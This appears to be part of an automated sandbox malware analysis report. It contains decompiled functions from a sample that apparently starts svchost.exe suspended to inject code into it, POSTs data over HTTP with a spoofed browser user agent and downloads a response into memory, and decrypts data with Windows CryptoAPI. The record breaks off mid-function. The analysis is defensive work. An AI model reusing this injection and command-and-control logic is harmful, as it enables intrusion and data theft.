                                                                                                                                                                                                                                                                                          0x040023d4
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x040023da
                                                                                                                                                                                                                                                                                          0x04002227
                                                                                                                                                                                                                                                                                          0x0400222d
                                                                                                                                                                                                                                                                                          0x0400223a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04002245
                                                                                                                                                                                                                                                                                          0x04002252
                                                                                                                                                                                                                                                                                          0x0400225f
                                                                                                                                                                                                                                                                                          0x04002270
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04002276
                                                                                                                                                                                                                                                                                          0x040021d5
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04002196
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04002196

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetEnvironmentVariableA.KERNEL32(SystemRoot,?,00000104), ref: 040020D4
                                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,\system32\svchost.exe), ref: 040020E6
                                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,0400C38C), ref: 040020FE
                                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00000000), ref: 0400210F
                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 04002187
                                                                                                                                                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 040021C0
                                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 040021D5
                                                                                                                                                                                                                                                                                          • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040), ref: 040021FE
                                                                                                                                                                                                                                                                                          • VirtualAllocEx.KERNELBASE(?,00000000,?,00103000,00000040), ref: 04002227
                                                                                                                                                                                                                                                                                          • TerminateProcess.KERNEL32(?,00000000), ref: 04002245
                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 04002252
                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0400225F
                                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 04002270
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.730634851.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730592213.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730732791.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730766607.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Virtual$Alloclstrcat$CloseFreeHandleProcess$CreateEnvironmentTerminateVariable
                                                                                                                                                                                                                                                                                          • String ID: D$SystemRoot$\system32\svchost.exe
                                                                                                                                                                                                                                                                                          • API String ID: 1819736980-1559310322
                                                                                                                                                                                                                                                                                          • Opcode ID: 618df5bf54c1a5a0a6d1612c0a6f02d09146bff70f4639aa179a0dfbd2a6d315
                                                                                                                                                                                                                                                                                          • Instruction ID: 24de31acf85f81f6cd7956eb3c6d21bf067972eab508d3ad9c1f9881985dd567
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 618df5bf54c1a5a0a6d1612c0a6f02d09146bff70f4639aa179a0dfbd2a6d315
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 27D13F71A44215ABEB28DF54CC94FAE77B9FB48304F0486D8F609B7281D678AE80CF55
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 450 4001840-4001854 451 4001c95-4001c9b 450->451 452 400185a-400185e 450->452 452->451 453 4001864-4001868 452->453 453->451 454 400186e-4001872 453->454 454->451 455 4001878-400190a call 4007d20 InternetCrackUrlA 454->455 455->451 458 4001910-4001930 InternetOpenA 455->458 458->451 459 4001936-4001969 InternetConnectA 458->459 460 4001c88-4001c8f InternetCloseHandle 459->460 461 400196f-40019a7 HttpOpenRequestA 459->461 460->451 462 4001c7b-4001c82 InternetCloseHandle 461->462 463 40019ad-40019e5 wnsprintfA HttpAddRequestHeadersA 461->463 462->460 464 40019eb-40019f9 463->464 465 4001c6e-4001c75 InternetCloseHandle 463->465 466 4001a04-4001a26 InternetSetOptionA 464->466 467 40019fb-40019fe 464->467 465->462 468 4001a30-4001a75 call 4007d20 HttpSendRequestA 466->468 467->466 471 4001a7b-4001aa1 HttpQueryInfoA 468->471 472 4001c4c-4001c5f 468->472 474 4001aa3-4001abc call 4007dd0 471->474 475 4001ac9-4001b0f call 4007d20 HttpQueryInfoA 471->475 472->465 473 4001c61-4001c68 472->473 473->465 473->468 474->475 480 4001abe-4001ac7 474->480 481 4001b11-4001b2d call 4007dd0 475->481 482 4001b47-4001b6a VirtualAlloc 475->482 480->475 481->482 489 4001b2f-4001b39 481->489 484 4001b70-4001b93 482->484 485 4001c19 482->485 487 4001b99-4001bc9 InternetReadFile 484->487 488 4001c23-4001c4a InternetReadFile 485->488 490 4001bdb-4001be2 487->490 491 4001bcb-4001bd9 487->491 488->472 488->488 489->482 492 4001b3b-4001b41 489->492 493 4001be4 490->493 494 4001be6-4001c11 490->494 491->490 492->482 495 4001c17 493->495 496 4001c13 494->496 497 4001c15 494->497 495->472 496->495 497->487
                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E04001840(char* _a4, void* _a8, long _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr* _a24, intOrPtr _a28, intOrPtr* _a32) {
                                                                                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                                                                                          				char _v276;
                                                                                                                                                                                                                                                                                          				char _v1300;
                                                                                                                                                                                                                                                                                          				char _v1564;
                                                                                                                                                                                                                                                                                          				void* _v1568;
                                                                                                                                                                                                                                                                                          				void* _v1572;
                                                                                                                                                                                                                                                                                          				char* _v1576;
                                                                                                                                                                                                                                                                                          				intOrPtr _v1588;
                                                                                                                                                                                                                                                                                          				char* _v1592;
                                                                                                                                                                                                                                                                                          				signed short _v1612;
                                                                                                                                                                                                                                                                                          				intOrPtr _v1616;
                                                                                                                                                                                                                                                                                          				char* _v1620;
                                                                                                                                                                                                                                                                                          				void* _v1636;
                                                                                                                                                                                                                                                                                          				void* _v1640;
                                                                                                                                                                                                                                                                                          				void* _v1644;
                                                                                                                                                                                                                                                                                          				void* _v1648;
                                                                                                                                                                                                                                                                                          				long _v1652;
                                                                                                                                                                                                                                                                                          				void _v1656;
                                                                                                                                                                                                                                                                                          				void _v1916;
                                                                                                                                                                                                                                                                                          				long _v1920;
                                                                                                                                                                                                                                                                                          				long _v1924;
                                                                                                                                                                                                                                                                                          				long _v1928;
                                                                                                                                                                                                                                                                                          				void* _v1932;
                                                                                                                                                                                                                                                                                          				intOrPtr _v1936;
                                                                                                                                                                                                                                                                                          				long _v1940;
                                                                                                                                                                                                                                                                                          				long _v1944;
                                                                                                                                                                                                                                                                                          				long _v1948;
                                                                                                                                                                                                                                                                                          				void _v2972;
                                                                                                                                                                                                                                                                                          				long _v2976;
                                                                                                                                                                                                                                                                                          				int _t116;
                                                                                                                                                                                                                                                                                          				void* _t117;
                                                                                                                                                                                                                                                                                          				void* _t119;
                                                                                                                                                                                                                                                                                          				void* _t123;
                                                                                                                                                                                                                                                                                          				int _t133;
                                                                                                                                                                                                                                                                                          				void* _t143;
                                                                                                                                                                                                                                                                                          				long _t151;
                                                                                                                                                                                                                                                                                          				void* _t194;
                                                                                                                                                                                                                                                                                          				void* _t195;
                                                                                                                                                                                                                                                                                          				void* _t196;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0) {
                                                                                                                                                                                                                                                                                          					L37:
                                                                                                                                                                                                                                                                                          					return _v8;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_v1644 = 0;
                                                                                                                                                                                                                                                                                          					_v1640 = 0;
                                                                                                                                                                                                                                                                                          					_v1568 = 0;
                                                                                                                                                                                                                                                                                          					_v1576 = "*/*";
                                                                                                                                                                                                                                                                                          					_v1572 = 0;
                                                                                                                                                                                                                                                                                          					E04007D20( &_v1636,  &_v1636, 0, 0x3c);
                                                                                                                                                                                                                                                                                          					_t195 = _t194 + 0xc;
                                                                                                                                                                                                                                                                                          					_v1636 = 0x3c;
                                                                                                                                                                                                                                                                                          					_v1620 =  &_v1564;
                                                                                                                                                                                                                                                                                          					_v1616 = 0x104;
                                                                                                                                                                                                                                                                                          					_v1592 =  &_v276;
                                                                                                                                                                                                                                                                                          					_v1588 = 0x104;
                                                                                                                                                                                                                                                                                          					_t116 = InternetCrackUrlA(_a4, 0, 0,  &_v1636); // executed
                                                                                                                                                                                                                                                                                          					if(_t116 == 0) {
                                                                                                                                                                                                                                                                                          						goto L37;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t117 = InternetOpenA("Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)", 1, 0, 0, 0); // executed
                                                                                                                                                                                                                                                                                          					_v1644 = _t117;
                                                                                                                                                                                                                                                                                          					if(_v1644 == 0) {
                                                                                                                                                                                                                                                                                          						goto L37;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t119 = InternetConnectA(_v1644, _v1620, _v1612 & 0x0000ffff, 0, 0, 3, 0, 0); // executed
                                                                                                                                                                                                                                                                                          					_v1640 = _t119;
                                                                                                                                                                                                                                                                                          					if(_v1640 == 0) {
                                                                                                                                                                                                                                                                                          						L36:
                                                                                                                                                                                                                                                                                          						InternetCloseHandle(_v1644);
                                                                                                                                                                                                                                                                                          						goto L37;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t123 = HttpOpenRequestA(_v1640, "POST", _v1592, 0, 0,  &_v1576, 0x200300, 0); // executed
                                                                                                                                                                                                                                                                                          					_v1568 = _t123;
                                                                                                                                                                                                                                                                                          					if(_v1568 == 0) {
                                                                                                                                                                                                                                                                                          						L35:
                                                                                                                                                                                                                                                                                          						InternetCloseHandle(_v1640);
                                                                                                                                                                                                                                                                                          						goto L36;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					wnsprintfA( &_v1300, 0x400, "Accept-Language: en-us\r\nContent-Type: application/octet-stream\r\nContent-Length: %d\r\n", _a12);
                                                                                                                                                                                                                                                                                          					_t196 = _t195 + 0x10;
                                                                                                                                                                                                                                                                                          					if(HttpAddRequestHeadersA(_v1568,  &_v1300, 0xffffffff, 0) == 0) {
                                                                                                                                                                                                                                                                                          						L34:
                                                                                                                                                                                                                                                                                          						InternetCloseHandle(_v1568); // executed
                                                                                                                                                                                                                                                                                          						goto L35;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_v1656 = 0x7530;
                                                                                                                                                                                                                                                                                          					if(_a28 > 0) {
                                                                                                                                                                                                                                                                                          						_v1656 = _a28;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					InternetSetOptionA(_v1568, 6,  &_v1656, 4);
                                                                                                                                                                                                                                                                                          					_v1652 = 1;
                                                                                                                                                                                                                                                                                          					_v1648 = 0;
                                                                                                                                                                                                                                                                                          					do {
                                                                                                                                                                                                                                                                                          						_v1920 = 0x100;
                                                                                                                                                                                                                                                                                          						E04007D20( &_v1916,  &_v1916, 0, 0x100);
                                                                                                                                                                                                                                                                                          						_t196 = _t196 + 0xc;
                                                                                                                                                                                                                                                                                          						_v1924 = 0;
                                                                                                                                                                                                                                                                                          						_t133 = HttpSendRequestA(_v1568, 0, 0, _a8, _a12); // executed
                                                                                                                                                                                                                                                                                          						if(_t133 == 0) {
                                                                                                                                                                                                                                                                                          							goto L32;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						if(HttpQueryInfoA(_v1568, 0x13,  &_v1916,  &_v1920,  &_v1924) != 0) {
                                                                                                                                                                                                                                                                                          							_t137 = E04007DD0( &_v1916);
                                                                                                                                                                                                                                                                                          							_t196 = _t196 + 4;
                                                                                                                                                                                                                                                                                          							_v1936 = _t137;
                                                                                                                                                                                                                                                                                          							if(_a32 != 0) {
                                                                                                                                                                                                                                                                                          								_t137 = _a32;
                                                                                                                                                                                                                                                                                          								 *_a32 = _v1936;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						E04007D20(_t137,  &_v1916, 0, 0x100);
                                                                                                                                                                                                                                                                                          						_t196 = _t196 + 0xc;
                                                                                                                                                                                                                                                                                          						_v1928 = 0x500000;
                                                                                                                                                                                                                                                                                          						if(HttpQueryInfoA(_v1568, 5,  &_v1916,  &_v1920,  &_v1924) != 0) {
                                                                                                                                                                                                                                                                                          							_t151 = E04007DD0( &_v1916);
                                                                                                                                                                                                                                                                                          							_t196 = _t196 + 4;
                                                                                                                                                                                                                                                                                          							_v1940 = _t151;
                                                                                                                                                                                                                                                                                          							if(_v1940 > 0 && _v1940 < 0x40000000) {
                                                                                                                                                                                                                                                                                          								_v1928 = _v1940;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_t143 = VirtualAlloc(0, _v1928, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                                          						_v1932 = _t143;
                                                                                                                                                                                                                                                                                          						if(_v1932 == 0) {
                                                                                                                                                                                                                                                                                          							_v2976 = 0;
                                                                                                                                                                                                                                                                                          							do {
                                                                                                                                                                                                                                                                                          								InternetReadFile(_v1568,  &_v2972, 0x400,  &_v2976);
                                                                                                                                                                                                                                                                                          							} while (_v2976 > 0);
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							 *_a16 = _v1932;
                                                                                                                                                                                                                                                                                          							 *_a20 = _v1928;
                                                                                                                                                                                                                                                                                          							_v8 = 1;
                                                                                                                                                                                                                                                                                          							_v1944 = _v1928;
                                                                                                                                                                                                                                                                                          							while(1) {
                                                                                                                                                                                                                                                                                          								_v1948 = 0;
                                                                                                                                                                                                                                                                                          								InternetReadFile(_v1568, _v1932, _v1944,  &_v1948); // executed
                                                                                                                                                                                                                                                                                          								if(_a24 != 0) {
                                                                                                                                                                                                                                                                                          									 *_a24 =  *_a24 + _v1948;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								if(_v1948 == 0) {
                                                                                                                                                                                                                                                                                          									break;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								_v1932 = _v1932 + _v1948;
                                                                                                                                                                                                                                                                                          								_v1944 = _v1944 - _v1948;
                                                                                                                                                                                                                                                                                          								if(_v1944 > 0) {
                                                                                                                                                                                                                                                                                          									continue;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								L29:
                                                                                                                                                                                                                                                                                          								goto L32;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							goto L29;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						L32:
                                                                                                                                                                                                                                                                                          						_v1648 = _v1648 + 1;
                                                                                                                                                                                                                                                                                          					} while (_v8 == 0 && _v1648 < 1);
                                                                                                                                                                                                                                                                                          					goto L34;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}










































                                                                                                                                                                                                                                                                                          0x04001849
                                                                                                                                                                                                                                                                                          0x04001854
                                                                                                                                                                                                                                                                                          0x04001c95
                                                                                                                                                                                                                                                                                          0x04001c9b
                                                                                                                                                                                                                                                                                          0x04001878
                                                                                                                                                                                                                                                                                          0x04001878
                                                                                                                                                                                                                                                                                          0x04001882
                                                                                                                                                                                                                                                                                          0x0400188c
                                                                                                                                                                                                                                                                                          0x04001896
                                                                                                                                                                                                                                                                                          0x040018a0
                                                                                                                                                                                                                                                                                          0x040018b5
                                                                                                                                                                                                                                                                                          0x040018ba
                                                                                                                                                                                                                                                                                          0x040018bd
                                                                                                                                                                                                                                                                                          0x040018cd
                                                                                                                                                                                                                                                                                          0x040018d3
                                                                                                                                                                                                                                                                                          0x040018e3
                                                                                                                                                                                                                                                                                          0x040018e9
                                                                                                                                                                                                                                                                                          0x04001902
                                                                                                                                                                                                                                                                                          0x0400190a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0400191d
                                                                                                                                                                                                                                                                                          0x04001923
                                                                                                                                                                                                                                                                                          0x04001930
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04001956
                                                                                                                                                                                                                                                                                          0x0400195c
                                                                                                                                                                                                                                                                                          0x04001969
                                                                                                                                                                                                                                                                                          0x04001c88
                                                                                                                                                                                                                                                                                          0x04001c8f
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04001c8f
                                                                                                                                                                                                                                                                                          0x04001994
                                                                                                                                                                                                                                                                                          0x0400199a
                                                                                                                                                                                                                                                                                          0x040019a7
                                                                                                                                                                                                                                                                                          0x04001c7b
                                                                                                                                                                                                                                                                                          0x04001c82
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04001c82
                                                                                                                                                                                                                                                                                          0x040019c2
                                                                                                                                                                                                                                                                                          0x040019c8
                                                                                                                                                                                                                                                                                          0x040019e5
                                                                                                                                                                                                                                                                                          0x04001c6e
                                                                                                                                                                                                                                                                                          0x04001c75
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04001c75
                                                                                                                                                                                                                                                                                          0x040019eb
                                                                                                                                                                                                                                                                                          0x040019f9
                                                                                                                                                                                                                                                                                          0x040019fe
                                                                                                                                                                                                                                                                                          0x040019fe
                                                                                                                                                                                                                                                                                          0x04001a16
                                                                                                                                                                                                                                                                                          0x04001a1c
                                                                                                                                                                                                                                                                                          0x04001a26
                                                                                                                                                                                                                                                                                          0x04001a30
                                                                                                                                                                                                                                                                                          0x04001a30
                                                                                                                                                                                                                                                                                          0x04001a48
                                                                                                                                                                                                                                                                                          0x04001a4d
                                                                                                                                                                                                                                                                                          0x04001a50
                                                                                                                                                                                                                                                                                          0x04001a6d
                                                                                                                                                                                                                                                                                          0x04001a75
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04001aa1
                                                                                                                                                                                                                                                                                          0x04001aaa
                                                                                                                                                                                                                                                                                          0x04001aaf
                                                                                                                                                                                                                                                                                          0x04001ab2
                                                                                                                                                                                                                                                                                          0x04001abc
                                                                                                                                                                                                                                                                                          0x04001abe
                                                                                                                                                                                                                                                                                          0x04001ac7
                                                                                                                                                                                                                                                                                          0x04001ac7
                                                                                                                                                                                                                                                                                          0x04001abc
                                                                                                                                                                                                                                                                                          0x04001ad7
                                                                                                                                                                                                                                                                                          0x04001adc
                                                                                                                                                                                                                                                                                          0x04001adf
                                                                                                                                                                                                                                                                                          0x04001b0f
                                                                                                                                                                                                                                                                                          0x04001b18
                                                                                                                                                                                                                                                                                          0x04001b1d
                                                                                                                                                                                                                                                                                          0x04001b20
                                                                                                                                                                                                                                                                                          0x04001b2d
                                                                                                                                                                                                                                                                                          0x04001b41
                                                                                                                                                                                                                                                                                          0x04001b41
                                                                                                                                                                                                                                                                                          0x04001b2d
                                                                                                                                                                                                                                                                                          0x04001b57
                                                                                                                                                                                                                                                                                          0x04001b5d
                                                                                                                                                                                                                                                                                          0x04001b6a
                                                                                                                                                                                                                                                                                          0x04001c19
                                                                                                                                                                                                                                                                                          0x04001c23
                                                                                                                                                                                                                                                                                          0x04001c3d
                                                                                                                                                                                                                                                                                          0x04001c43
                                                                                                                                                                                                                                                                                          0x04001b70
                                                                                                                                                                                                                                                                                          0x04001b79
                                                                                                                                                                                                                                                                                          0x04001b84
                                                                                                                                                                                                                                                                                          0x04001b86
                                                                                                                                                                                                                                                                                          0x04001b93
                                                                                                                                                                                                                                                                                          0x04001b99
                                                                                                                                                                                                                                                                                          0x04001b99
                                                                                                                                                                                                                                                                                          0x04001bbf
                                                                                                                                                                                                                                                                                          0x04001bc9
                                                                                                                                                                                                                                                                                          0x04001bd9
                                                                                                                                                                                                                                                                                          0x04001bd9
                                                                                                                                                                                                                                                                                          0x04001be2
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04001bf2
                                                                                                                                                                                                                                                                                          0x04001c04
                                                                                                                                                                                                                                                                                          0x04001c11
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04001c15
                                                                                                                                                                                                                                                                                          0x04001c17
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04001c17
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04001be4
                                                                                                                                                                                                                                                                                          0x04001c4c
                                                                                                                                                                                                                                                                                          0x04001c55
                                                                                                                                                                                                                                                                                          0x04001c5b
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04001a30

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • InternetCrackUrlA.WININET(00000000,00000000,00000000,0000003C), ref: 04001902
                                                                                                                                                                                                                                                                                          • InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1),00000001,00000000,00000000,00000000), ref: 0400191D
                                                                                                                                                                                                                                                                                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 04001956
                                                                                                                                                                                                                                                                                          • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,0400C2C8,00200300,00000000), ref: 04001994
                                                                                                                                                                                                                                                                                          • wnsprintfA.SHLWAPI ref: 040019C2
                                                                                                                                                                                                                                                                                          • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,00000000), ref: 040019DD
                                                                                                                                                                                                                                                                                          • InternetSetOptionA.WININET(00000000,00000006,00007530,00000004), ref: 04001A16
                                                                                                                                                                                                                                                                                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 04001A6D
                                                                                                                                                                                                                                                                                          • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 04001A99
                                                                                                                                                                                                                                                                                          • HttpQueryInfoA.WININET(00000000,00000005,?,00000100,00000000), ref: 04001B07
                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00500000,00003000,00000004), ref: 04001B57
                                                                                                                                                                                                                                                                                          • InternetReadFile.WININET(00000000,00000000,?,00000000), ref: 04001BBF
                                                                                                                                                                                                                                                                                          • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 04001C3D
                                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 04001C75
                                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 04001C82
                                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 04001C8F
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          • 0u, xrefs: 040019EB
                                                                                                                                                                                                                                                                                          • <, xrefs: 040018BD
                                                                                                                                                                                                                                                                                          • POST, xrefs: 04001988
                                                                                                                                                                                                                                                                                          • Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1), xrefs: 04001918
                                                                                                                                                                                                                                                                                          • Accept-Language: en-usContent-Type: application/octet-streamContent-Length: %d, xrefs: 040019B1
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.730634851.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730592213.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730732791.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730766607.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Internet$Http$CloseHandleRequest$FileInfoOpenQueryRead$AllocConnectCrackHeadersOptionSendVirtualwnsprintf
                                                                                                                                                                                                                                                                                          • String ID: 0u$<$Accept-Language: en-usContent-Type: application/octet-streamContent-Length: %d$Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)$POST
                                                                                                                                                                                                                                                                                          • API String ID: 880997049-2804282621
                                                                                                                                                                                                                                                                                          • Opcode ID: d9d4cb28da70c868705f456cd8ab0708f990bc07d580d9120d59bd3b3f766fdd
                                                                                                                                                                                                                                                                                          • Instruction ID: 104ecec6680c69d5e391cf9d7718dbecb1b5f59d1f4ca396f8eadafade2250d2
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d9d4cb28da70c868705f456cd8ab0708f990bc07d580d9120d59bd3b3f766fdd
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 89C10BB19442189BFB64CF50CC49FD9B7B5EB88704F0481D9E60DAA2C0DB7AAAD4CF50
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 536 40047f0-4004801 537 4004807-400480e 536->537 538 4004aab-4004ab1 536->538 537->538 539 4004814-4004832 CryptAcquireContextA 537->539 540 4004834-400483f GetLastError 539->540 541 4004856-400485a 539->541 540->541 542 4004841-4004850 CryptAcquireContextA 540->542 541->538 543 4004860-400489d 541->543 542->541 545 40048a3-40048f3 call 4007b70 CryptCreateHash 543->545 546 4004a9f-4004aa5 CryptReleaseContext 543->546 549 4004a90-4004a96 545->549 550 40048f9-4004913 CryptHashData 545->550 546->538 551 4004a98 549->551 552 4004a9a 549->552 553 4004a83-4004a8a CryptDestroyHash 550->553 554 4004919-4004944 CryptDeriveKey 550->554 551->546 552->546 553->549 554->553 555 400494a-400498f CryptDecrypt CryptDestroyKey 554->555 555->553 556 4004995-40049b1 CryptCreateHash 555->556 556->553 557 40049b7-40049d4 CryptHashData 556->557 558 4004a76-4004a7d CryptDestroyHash 557->558 559 40049da-4004a0f CryptGetHashParam 557->559 558->553 559->558 560 4004a11-4004a3c CryptGetHashParam 559->560 560->558 561 4004a3e-4004a58 call 4007c70 560->561 561->558 564 4004a5a-4004a72 call 4007b70 561->564 564->558
                                                                                                                                                                                                                                                                                          C-Code - Quality: 37%
                                                                                                                                                                                                                                                                                          			E040047F0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                                          				signed int _v5;
                                                                                                                                                                                                                                                                                          				long* _v12;
                                                                                                                                                                                                                                                                                          				char _v28;
                                                                                                                                                                                                                                                                                          				char _v764;
                                                                                                                                                                                                                                                                                          				char _v780;
                                                                                                                                                                                                                                                                                          				intOrPtr _v784;
                                                                                                                                                                                                                                                                                          				char _v788;
                                                                                                                                                                                                                                                                                          				int _v792;
                                                                                                                                                                                                                                                                                          				int _v796;
                                                                                                                                                                                                                                                                                          				intOrPtr _v800;
                                                                                                                                                                                                                                                                                          				long* _v804;
                                                                                                                                                                                                                                                                                          				int _v808;
                                                                                                                                                                                                                                                                                          				int _v812;
                                                                                                                                                                                                                                                                                          				char _v816;
                                                                                                                                                                                                                                                                                          				int _v820;
                                                                                                                                                                                                                                                                                          				char _v824;
                                                                                                                                                                                                                                                                                          				char _v828;
                                                                                                                                                                                                                                                                                          				char _v844;
                                                                                                                                                                                                                                                                                          				int _t61;
                                                                                                                                                                                                                                                                                          				char* _t67;
                                                                                                                                                                                                                                                                                          				intOrPtr _t68;
                                                                                                                                                                                                                                                                                          				int _t69;
                                                                                                                                                                                                                                                                                          				char* _t73;
                                                                                                                                                                                                                                                                                          				intOrPtr _t74;
                                                                                                                                                                                                                                                                                          				intOrPtr _t76;
                                                                                                                                                                                                                                                                                          				intOrPtr _t77;
                                                                                                                                                                                                                                                                                          				signed char _t78;
                                                                                                                                                                                                                                                                                          				void* _t109;
